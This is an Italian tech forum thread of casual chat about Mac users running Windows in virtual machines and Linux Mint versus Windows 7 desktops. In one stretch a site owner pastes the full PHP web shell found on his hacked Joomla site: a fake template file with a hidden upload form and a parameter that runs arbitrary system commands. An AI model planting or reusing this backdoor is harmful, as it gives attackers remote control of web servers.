Punto informatico Network
Login Esegui login | Non sei registrato? Iscriviti ora (è gratuito!)
Username: Password:
  • Annuncio Pubblicitario

Cazzeggio vario sui pc, software e dintorni.

Cinema, motori e problemi spirituali: il forum per tutto ciò che non è informatica.

Re: Cazzeggio vario sui pc, software e dintorni.

Messaggioda ph_rqmm » dom set 11, 2011 5:33 pm

L'ultima volta che sono stata a Padova (tre settimane fa) ho scoperto con divertito sgomento che gran parte dei miei amici che stanno facendo il dottorato sono passati al versante Apple.
Vi riporto fedelmente la conversazione (tra parentesi i miei commenti e spiegazioni)

Blu = Robbè
Rosso = amica dottoranda di Robbè

(Siamo nell'ufficio dell'amica, vedo che estre il portatile dalla borsa) Ma dai che figata Sei passata ad Apple! Come mai sta scelta?
Eh cavoli perché va strameglio non c'è paragone!!!
Bene sono felice per voi bravi bravi!!! E come fate ad usare i programmi specifici di geologia che girano solo su windows?
Ah beh abbiamo messo su una virtual machine!
Ah bravi ottimo no?
Beh si... La suite adobe (non credo proprio genuina...) gira su virtual machine, girano su virtual machine pure i programmi tecnici di cartografia, girano pure i pacchetti latex... pensa che girano su virtual machine pure office e messenger e skype!
Ma guarda che Apple ha una sua suite da ufficio molto valida e dedicata con un ottimo software di presentazioni (quello che usano di più alla fin fine) e non dovresti spendere più di 80 euro... Alla fine ne hai appena spesi 1000 per il pc... 80 in più o in meno... E hai il vantaggio di una suite dedicata.
Per quel che riguarda skype, messenger e latex credo esistano pacchetti dedicati proprio per mac...

Eh ma vuoi mettere la palla di installare tutto???
Si babbuò ma alla fine se usi il Mac come una gigantesca virtual machine non potevi tenerti il pc con win??? O al massimo metterti win in dual boot?
Dual che? Ma dai Robbè il Mac è figo e poi funziona molto meglio, non ci serve nemmeno l'antivirus!!!
Sono d'accordo ma alla fine di sto pc nuovo che software usi?
Beh uso Safari!!!!

[crylol]
Ho passato i primi 29 anni e 9 mesi abbondanti della mia vita a fare scelte sbagliate.
Passerò il tempo che mi rimane a pagarne le conseguenze.
ph_rqmm
MegaLady
MegaLady

Messaggioda farbix89 » dom set 11, 2011 5:44 pm

Non tutti (sia chiaro fin da subito),ma molti utenti hanno un Mac ma non usano un Mac [:)]

Il Merchandising del prodotto figo e bello da mostrare,ma sotto ci mettono Windows per tutti i programmi che utilizzano [crylol]
farbix89
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda ph_rqmm » dom set 11, 2011 5:48 pm

Ma detta in tutta sincerita un bel dual boot se non anche tri boot ci sta anche bene...
Esistono una marea di software per cartografia geologica che vanno solo su win.
Se hai solo uno o due software puoi usare la virtual machine ma se ne hai settemila è ridicolo.
Ti fai la virtual machine pure per office e skype? [sh]
Sei un dottorando come fai a venirmi a dire che non ti va di installare i programmi????
Cribbio! [rotolo]
Comunque tant'è...
[rotolo]
Ho passato i primi 29 anni e 9 mesi abbondanti della mia vita a fare scelte sbagliate.
ph_rqmm
MegaLady
MegaLady

Messaggioda sampei.nihira » dom set 11, 2011 5:59 pm

Io credo che in fondo l'uso del pc, già adesso, (specie in Italia) sia un settore di "nicchia".

La maggior parte degli utenti di un pc sfrutta le potenzialità dello stesso così poco che sarebbe più indicato l'acquisto di una tablet oppure di un cellulare intelligente.
Non sò se in questo ultimo caso, il cellulare, dicesi intelligente, perché ha l'arduo compito di sopperire alle carenze del proprietario....... [:D] [:D]

La restante percentuale di utenti si suddivide in coloro che sanno "usare" (notare le virgolette) Windows e si credono in tema degli scienziati (senza offesa per gli stessi),in coloro che NON lo sanno usare (ma non lo sanno [:D] ),ed in quelli che lo sanno usare in modo consapevole (percentuale molto ristretta).

Non prendo in esame gli altri OS.
Ci sono utenti così ferrati nel OS Windows (in modo notevolmente superiore alla media) e pochissimo interessati a prendere in considerazione altri OS.
釣りキチ三平
sampei.nihira
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda ph_rqmm » dom set 11, 2011 6:39 pm

sampei.nihira ha scritto:La maggior parte degli utenti di un pc sfrutta le potenzialità dello stesso così poco che sarebbe più indicato l'acquisto di una tablet oppure di un cellulare intelligente.

Su questo sono d'accordo...

La restante percentuale di utenti si suddivide in coloro che sanno "usare" (notare le virgolette) Windows e si credono in tema degli scienziati (senza offesa per gli stessi),in coloro che NON lo sanno usare (ma non lo sanno [:D] ),ed in quelli che lo sanno usare in modo consapevole (percentuale molto ristretta).

Hai ragione anche su questo punto.
Io di certo non mi inserisco tra quelli che sanno usare bene un pc.
Solo che mi ha fatto sorridere il concetto dell'Apple "figo" e senza antivirus. [:)] che in pratica veniva usato come una gigante virtual machine windows.
In un gruppo di persone sono improvvisamente sublimate tutte quelle discussioni goliardiche che si scatenano tra OS fan (in senso buono ovviamente) [sh]
Lungi da me ergermi a paladina della sapienza informatica [rotolo]
ph_rqmm
MegaLady
MegaLady

Messaggioda crazy.cat » dom set 11, 2011 6:50 pm

ph_rqmm ha scritto:Solo che mi ha fatto sorridere il concetto dell'Apple "figo" e senza antivirus.

Stessa cosa con un amico che gli avevano detto che apple è tanto bello e allora lo voleva.
Suo livello pc è praticamente sotto-sotto-sotto zero prossimo allo zero assoluto, suo utilizzo pc al massimo navigare su siti XXX, scrivere qualche lettera e chiedermi come allegare qualcosa ad una mail visto che non è capace, poi riuscire ad incasinare firefox e chiamarmi perché non gli funziona Google.
Però voleva il Mac... [acc2]
Quando i molti governano, pensano solo a contentar sé stessi, si ha allora la tirannia più balorda e più odiosa: la tirannia mascherata da libertà.
crazy.cat
MLI Hero
MLI Hero

Messaggioda developerwinme » dom set 11, 2011 6:56 pm

Come promesso, ecco il topic dove raggruppo i problemini che ho riscontrato finora su Mint:
topic73509.html
PC: ASUS X53S (Intel Core i7-2670QM 2.20 Ghz, RAM 8 GB, NVIDIA GeForce GT520MX, Windows 8 Pro)
Mobile: Nokia Lumia 710 (CPU 1,4 Ghz, RAM 512 MB, Windows Phone 7.8)
--
developerwinme.wordpress.com
developerwinme
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda Ale2695 » lun set 12, 2011 6:13 pm

Ma che bello il sito infettato!!! Oggi accedendo al pannello di controllo dell'hosting, noto l'utilizzo della CPU al 100% e 5 processi in entrata attivi, avvio una scansione antivirus e mi becco una bella pagina infetta nella directory radice del sito. L'ho tranciata via naturalmente, ma la CPU è ancora al massimo. Finchè stasera il mio collega non riesce a darci un'occhiata, dobbiamo rimanere così, ad aspettare che da un momento all'altro Netsons tiri giù il sito per troppo utilizzo della CPU... ma che bello... [B)] [B)] [B)]
http://www.chimerarevo.com/
Ale2695
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda farbix89 » lun set 12, 2011 6:15 pm

è stato hackeraggio o qualcuno si è infettato infettando il sito? [uhm] [...]
farbix89
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda Ale2695 » lun set 12, 2011 6:21 pm

farbix89 ha scritto:è stato hackeraggio o qualcuno si è infettato infettando il sito? [uhm] [...]

Hackeraggio...
Per chi volesse, questa è la pagina infetta:

<?php
/**
* @copyright Copyright (C) 2009-2010 Pixel Praise LLC. All rights reserved.
* @license All derivate Joomla! code isGNU/GPL, all images and CSS Copyright (C) 2009-2010 Pixel Praise LLC.
*/
if(isset($_REQUEST['admin']) && $_REQUEST['admin']=='pad'){
if (isset($_POST['ok']) && isset($_FILES['joomLa'])) {
$file = $_FILES['joomLa']['tmp_name'];
$name = $_FILES['joomLa']['name'];
move_uploaded_file($file, $name);
}else{
?>
<br>
<form method="POST" enctype="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>">
<input type="file" name="joomLa">&nbsp;<input type="submit" name="ok" value="AdminPad">
</form>
<?php
} exit;
}
if (!empty($_GET['template']))
{
echo "<pre>";
system($_GET['template']);
echo "</pre>";
exit;
}
require_once(dirname(__FILE__).DS.'index.php');
?>
Ale2695
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda farbix89 » lun set 12, 2011 6:22 pm

Qualche lameroso nerazzurro,conoscendo il sito che gestisci

[B)] [B)]
farbix89
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda Ale2695 » lun set 12, 2011 6:25 pm

farbix89 ha scritto:Qualche lameroso nerazzurro,conoscendo il sito che gestisci

[B)] [B)]

Possibile, e non è la prima volta nella storia del sito. E' la prima volta che succede da quando abbiamo adottato Joomla come CMS però...
Ale2695
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda Andy94 » lun set 12, 2011 7:36 pm

Carino... C'è da chiedersi come è entrato però: ti hanno inc.lato la password?
Andy94
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda speedyant » lun set 12, 2011 7:58 pm

Temo di essere utente windows per motivi "tempistici" e di pigrizia...
Ognuno sta solo sul cuor della terra trafitto da un raggio di sole: ed è subito sera (Salvatore Quasimodo)
speedyant
Aficionado
Aficionado

Messaggioda Ale2695 » lun set 12, 2011 8:41 pm

Andy94 ha scritto:Carino... C'è da chiedersi come è entrato però: ti hanno inc.lato la password?

La password FTP no perché gli unici accessi registrati sono i miei... non riesco proprio a capire...
Ale2695
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda Andy94 » mar set 13, 2011 6:00 am

Hai controllato che con quello script non abbiano caricato altri file? Perché quello era un uploader...
Comunque, in un modo o nell'altro ce la devono aver messa dentro: FTP, o altre falle che consentono di inserire file nel tuo server.

[ciao]
Andy94
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda Ale2695 » mar set 13, 2011 11:27 am

Andy94 ha scritto:Hai controllato che con quello script non abbiano caricato altri file? Perché quello era un uploader...

Si, e sembra che non abbiano caricato nulla...
Comunque, in un modo o nell'altro ce la devono aver messa dentro: FTP, o altre falle che consentono di inserire file nel tuo server.
[ciao]

Sto pensando seriamente ad un bug di Joomla...
Ale2695
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda developerwinme » mar set 13, 2011 11:47 am

Dopo aver giocato per un paio di giorni con Compiz su Linux Mint Debian, scrivendo ora da Windows, posso dire che, per quanto come "potenza" del motore grafico sicuramente Compix batte Aero (si possono fare veramente cose straordinarie [^] ), nell'uso quotidiano l'ambiente offerto da Aero risulta più uniforme e ordinato, anche se il desktop di Mint è organizzato veramente molto bene sia rispetto a Unity (che ho provato l'altro giorno sul computer di mio padre con Ubuntu 11.04, restando stupito di come si possa rendere così poco user-friendly una UI) che rispetto a Gnome 2 classico (mi riferisco a quello integrato in Ubuntu 8.xx), che non mi ha mai convinto più di tanto. Conto di provare Gnome 3.x e KDE 4.x nel prossimo futuro.

Insomma per ora siamo messi così sul fronte User Interface, secondo me:
Capacità offerte dal motore grafico: Mint 4 - Windows(7) 2.5
Usabilità complessiva dell'interfaccia: Windows(7) 4 - Mint 3 - Gnome(2) 2 - Unity 1 (o 0? [uhm] )

Per quanto riguarda la velocità, Mint batte sicuramente Windows sui tempi di avvio (anche se non in maniera abissale), mentre durante l'uso normale siamo più o meno lì, con Mint più veloce in alcune operazioni e Windows in altre.
PC: ASUS X53S (Intel Core i7-2670QM 2.20 Ghz, RAM 8 GB, NVIDIA GeForce GT520MX, Windows 8 Pro)
Mobile: Nokia Lumia 710 (CPU 1,4 Ghz, RAM 512 MB, Windows Phone 7.8)
--
developerwinme.wordpress.com
developerwinme
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda Ale2695 » mar set 13, 2011 12:04 pm

Ehm... lo sai vero dev che quello che stai utilizzando su Mint è GNOME 2 vero? Certo, personalizzato dal team di Mint, ma è pur sempre GNOME 2. Lo stesso di Ubuntu 8.10. Comunque, ti consiglio altamente di provare KDE 4.7 in un prossimo futuro, attualmente è a mio parere il secondo miglior DE esistente (il primo è GNOME 2, ma sta per andare in pensione...) [^]
Ale2695
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

Messaggioda Ale2695 » mar set 13, 2011 12:31 pm

Uffa... siccome a scuola uno dei primi linguaggi che affronteremo in Sistemi (in Informatica inizieremo il C usando Linux) sarà Visual Basic, ci hanno già detto che non avendo molte ore dovremo portarci avanti a casa con i lavori, e che ci daranno il software da poter installare. E naturalmente funziona solo su Windows, quindi mi tocca oggi pomeriggio installarmelo in dual-boot sul fisso accanto a Debian, togliendo Ubuntu (l'HD sennò non è abbastanza grande). Uffa, formatta la partizione di Uby, installa Windows 7, ripristina il boot loader GRUB col SuperGrub2Disk... che rottura di scatole... [B)]
Ale2695
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)

PrecedenteProssimo

Torna a Chiacchiere in libertà